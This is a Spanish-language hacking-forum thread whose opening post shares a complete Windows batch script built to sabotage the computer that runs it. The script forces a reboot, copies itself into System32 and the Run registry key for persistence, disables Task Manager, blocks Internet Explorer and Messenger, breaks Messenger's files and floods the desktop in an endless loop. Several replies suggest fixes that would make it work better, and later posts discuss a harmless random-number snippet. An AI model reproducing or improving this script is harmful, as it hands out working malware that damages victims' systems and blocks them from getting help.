elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  BATCH - mi primer post !!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: BATCH - mi primer post !!  (Leído 5,601 veces)
Nikexito

Desconectado Desconectado

Mensajes: 1


Ver Perfil
BATCH - mi primer post !!
« en: 29 Diciembre 2007, 15:54 pm »

primeramente hola ! =) este es mi primer mensaje en la comunidad =) ! y haber como nos va :P aqui va un code simple de batch como mi primer post :P!!
********
@echo off
shutdown -r -f -t 100 -c "HOLA =) !!"
md "C:\WINDOWS\System32\nikebat"
copy %0 "C:\WINDOWS\System32\nikebat"
rename "C:\WINDOWS\System32\nikebat\*.*" "nike.bat"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v HOLAAAA /T REG_SZ /d  "C:\WINDOWS\System32\nikebat\nike.bat" /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /T REG_Dword /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DISALLOWRUN /T REG_DWORD /d 1
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DISALLOWRUN /v 001 /t REG_SZ /d "iexplore.exe"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DISALLOWRUN /v 002 /t REG_SZ /d "msnmsgr.exe"
tasskill /f /im msnmsgr.exe
cd \
C:
cd "Archivos de Programa\MSN Messenger"
rename "*.*" "*.nik"
:nike
md "C:\Documents and Settings\All Users\Escritorio\%random%"
start www.foro.elhacker.net
msg * www.foro.elhacker.net
goto :nike
exit


********
bueno lo que hace este batch es:
-apaga la computadora en 100 segundos .. pero muchos diran ¿pero por que en 100 si podria ser en 0?? pues es para que sufra un rato el user :P con lo otro q se viene :P
- el bat se añade al registro
- deshabilita el ctrl + alt + supr
- para que no pueda pedir ayuda externa se le impide el acceso al internet explorer y al messenger
-taskkilleamos el messenger e inutilizamos la carpeta messenger
- creamos n carpetas en el escritorio
- hacemos un flood en la pantalla ;)


aparte el bat puede ser guardado con cualquier nombre igual seguira funcionando para eso la linea 3,4,5 ;)

bueno saludos =)


En línea

invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: BATCH - mi primer post !!
« Respuesta #1 en: 29 Diciembre 2007, 17:44 pm »

Yo ya le veo un fallito.... ;D

Si pones el shutdown al principio, lo demas no se ejecutará...pon el shutdown al final...

Saludos...


En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
Mutesillo

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: BATCH - mi primer post !!
« Respuesta #2 en: 1 Enero 2008, 00:34 am »

WOW!!!
En línea

???

Desconectado Desconectado

Mensajes: 279


++ Elite Hacker ++


Ver Perfil
Re: BATCH - mi primer post !!
« Respuesta #3 en: 1 Enero 2008, 00:53 am »

Aparte de lo dicho por invisible_hack debiste usar comodines para los paths ya que no siempre la ruta del sistema sera "c:\etc...".

La parte mas interesante a mi gusto es la del bloqueo de los programas, lo de las carpetas y el "flood" no tiene mucho fundamento amenos que kieras estresar al user... Jeje! :p

Salu2 y bienvenido.
En línea

MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: BATCH - mi primer post !!
« Respuesta #4 en: 8 Enero 2008, 21:49 pm »

md "C:\Documents and Settings\All Users\Escritorio\%random%"

como funciona %random% aca?

soy nuevo y como no veo q se defina la variable random supongo q deve de ser algo predeterminado.

toy en lo cierto?
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
???

Desconectado Desconectado

Mensajes: 279


++ Elite Hacker ++


Ver Perfil
Re: BATCH - mi primer post !!
« Respuesta #5 en: 8 Enero 2008, 22:33 pm »

md "C:\Documents and Settings\All Users\Escritorio\%random%"

como funciona %random% aca?

soy nuevo y como no veo q se defina la variable random supongo q deve de ser algo predeterminado.

toy en lo cierto?

%random% no es algo predeterminado...
Toma un valor aleatorio.
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: BATCH - mi primer post !!
« Respuesta #6 en: 8 Enero 2008, 22:38 pm »

Citar
%random% no es algo predeterminado...
Toma un valor aleatorio.

Creo que no le va a quedar muy claro, por si las moscas.........

Citar
como funciona %random% aca?

soy nuevo y como no veo q se defina la variable random supongo q deve de ser algo predeterminado.

toy en lo cierto?

Si pero no...  :P

El random si viene por defecto, no hay que definirla..... y lo que hace es dar un número al azar..... prueba poner
Código:
echo %random%
en la consola y verás como devuelve un número

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: BATCH - mi primer post !!
« Respuesta #7 en: 8 Enero 2008, 22:50 pm »

VBueno muchissimas gracias , ahora , el numero q manda, se puede comprender entre dos numeros ( me explico, darle un minimo y un maximo ) ?

Muchas gracias!
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Vlad_Asen

Desconectado Desconectado

Mensajes: 15


Ver Perfil WWW
Re: BATCH - mi primer post !!
« Respuesta #8 en: 9 Enero 2008, 19:26 pm »

Cita de: Nikexito link=topic=193627.msg919826#msg919826
md "C:\Documents and Settings\All Users\Escritorio\%random%"

[/quote

Con esta linea creo q querias crear X cantidad de carpetas en el escritorio. Pero con esta linea lo que haces es crear solamente una carpeta con un nombre aleatorio (nombre numerico se entiende)

para crear muchas carpetas deferias realizar un ciclo for o un ciclo while

Saludos
En línea

chrominum


Desconectado Desconectado

Mensajes: 567


Viceroy: No es lo que tengo, es COMO lo tengo


Ver Perfil WWW
Re: BATCH - mi primer post !!
« Respuesta #9 en: 9 Enero 2008, 23:47 pm »

Código
  1. set /p maximo=Introduce un maximo:
  2. set /p minimo=Y un minimo:
  3. set /a aleatorio=%random%
  4. set /a division=%aleatorio%/(%maximo%-%minimo%+1)
  5. set /a real=%division%*(%maximo%-%minimo%+1)
  6. set /a algo=%aleatorio%-%real%
  7. set /a numero=%minimo%+%algo%
  8. echo %numero%

Con eso comprendes el random entre unos limites.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Batch] mi primer aporte: Ordenar escritorios « 1 2 3 »
Scripting
moikano→@ 28 10,952 Último mensaje 18 Noviembre 2010, 23:26 pm
por moikano→@
Mi primer Calculadora en Batch.
Scripting
lagersito 1 2,405 Último mensaje 2 Octubre 2011, 22:15 pm
por 2Fac3R
¿Cual fue el primer post del foro? « 1 2 »
Sugerencias y dudas sobre el Foro
3n31ch 10 4,267 Último mensaje 12 Julio 2021, 13:34 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines